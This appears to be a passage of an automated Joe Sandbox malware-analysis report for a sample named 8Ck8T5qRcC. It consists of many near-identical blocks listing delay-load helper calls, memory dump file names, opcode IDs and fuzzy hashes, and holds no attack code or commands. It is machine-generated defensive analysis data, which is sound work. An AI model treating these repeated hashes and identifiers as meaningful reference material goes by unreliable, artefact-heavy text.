                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: cce3adfd34d85bff1152db80856119d24098f49fb50bb8533b22ef49cf0c00ea
                                                                    • Instruction ID: fb986222fb3b96a44f8000b3ca5fe2daae5251447b29e2b01fb7ffe153db8eee
                                                                    • Opcode Fuzzy Hash: cce3adfd34d85bff1152db80856119d24098f49fb50bb8533b22ef49cf0c00ea
                                                                    • Instruction Fuzzy Hash: F1B012C139C001EC35045358ED02DF7052DC5C4B14330C57EF106C1281D8417C094131
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 377000972a477920398964572efa2ea60c99e83460c083264c3ed231864b9038
                                                                    • Instruction ID: 8fa91068310fb87a9b4d80f01d6c66d8c62441a29ff4b67668f5e591ecd2946b
                                                                    • Opcode Fuzzy Hash: 377000972a477920398964572efa2ea60c99e83460c083264c3ed231864b9038
                                                                    • Instruction Fuzzy Hash: 2FB012C139C101EC36045358EC02DF7092DC5C4B14330C63EF006C13C1D8417C4C0131
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: dca7d5ea524e9a9bdd40397712d2b62a5b4c7eaeedb7f84401d485b06d33e306
                                                                    • Instruction ID: 5b8dbd825ea7c4ec4e2a4b1093ba9062d0b6e9196ed06d6e002f5bb3ab44c0f2
                                                                    • Opcode Fuzzy Hash: dca7d5ea524e9a9bdd40397712d2b62a5b4c7eaeedb7f84401d485b06d33e306
                                                                    • Instruction Fuzzy Hash: 7AB012C139C001FC35045348AC02DF7052DC5C4B10330C57EF406C2181D8407C080131
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: d2bc5479f23e346e60adeed0634b564c90e413154008d7a99f023ba4ede0f7aa
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: d2bc5479f23e346e60adeed0634b564c90e413154008d7a99f023ba4ede0f7aa
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 31bb28a2ce0b1041985770f1f2e201bc5d1a8a37b3e700a5c9c67ca200973fb2
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 31bb28a2ce0b1041985770f1f2e201bc5d1a8a37b3e700a5c9c67ca200973fb2
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 04840c3fa446e56eb6d6d763e84f8ca601328ae1fd3fc3e12fdc8ab4217421fb
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 04840c3fa446e56eb6d6d763e84f8ca601328ae1fd3fc3e12fdc8ab4217421fb
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 7e199f1a47eb7c5c67cce5188ac5ddb5a372ee31897a7d8b2bd7993671c1da86
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 7e199f1a47eb7c5c67cce5188ac5ddb5a372ee31897a7d8b2bd7993671c1da86
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 08471d1f725897064bf2614223db17f2809244480891cf8ab774b471cf58d42b
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 08471d1f725897064bf2614223db17f2809244480891cf8ab774b471cf58d42b
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 0e03c15bd17f6195cb4d795c453a012c317906ad44e0df915ced0b5423f8eebf
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 0e03c15bd17f6195cb4d795c453a012c317906ad44e0df915ced0b5423f8eebf
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: c132ae5cd1171fa8c78f840c5d20c19781dd63238e3e98888043bde6aa2114bf
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: c132ae5cd1171fa8c78f840c5d20c19781dd63238e3e98888043bde6aa2114bf
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: fc1990a9d33323db428778c8e3c273f9be0a7eeb489d93aa41de3602ce76a5f9
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: fc1990a9d33323db428778c8e3c273f9be0a7eeb489d93aa41de3602ce76a5f9
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 43e5253bff55b9df779f39a794372ec4fbff77a0bfed380b0f6a71a68db7dd78
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 43e5253bff55b9df779f39a794372ec4fbff77a0bfed380b0f6a71a68db7dd78
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB068E
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 00a728d84573bb921cab4116b0c0cf12dfca4e17d3c437b1755813ad3e74593a
                                                                    • Instruction ID: 9fb4c8e2db813cb41892cd647098520f7dad8a74039c2ddd29eb7c51124623ff
                                                                    • Opcode Fuzzy Hash: 00a728d84573bb921cab4116b0c0cf12dfca4e17d3c437b1755813ad3e74593a
                                                                    • Instruction Fuzzy Hash: 09A0118A2A8203FC30082380AC02CFF0A0CC0C0B20330882EF00BC0080A880280A0030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 053e225f7e629a1992f47b8e51268ee9d10aed7b65d8b40aa05e70a7578a86d2
                                                                    • Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
                                                                    • Opcode Fuzzy Hash: 053e225f7e629a1992f47b8e51268ee9d10aed7b65d8b40aa05e70a7578a86d2
                                                                    • Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: d85221a4b393166e8c26022bdc8d9e4dbb55a674e1170ea10e9d47abb5b56159
                                                                    • Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
                                                                    • Opcode Fuzzy Hash: d85221a4b393166e8c26022bdc8d9e4dbb55a674e1170ea10e9d47abb5b56159
                                                                    • Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 1c65f8afd80d3f16fffa2beaf08abf47ec92fd552133e9eaa2b7d5e209c2c152
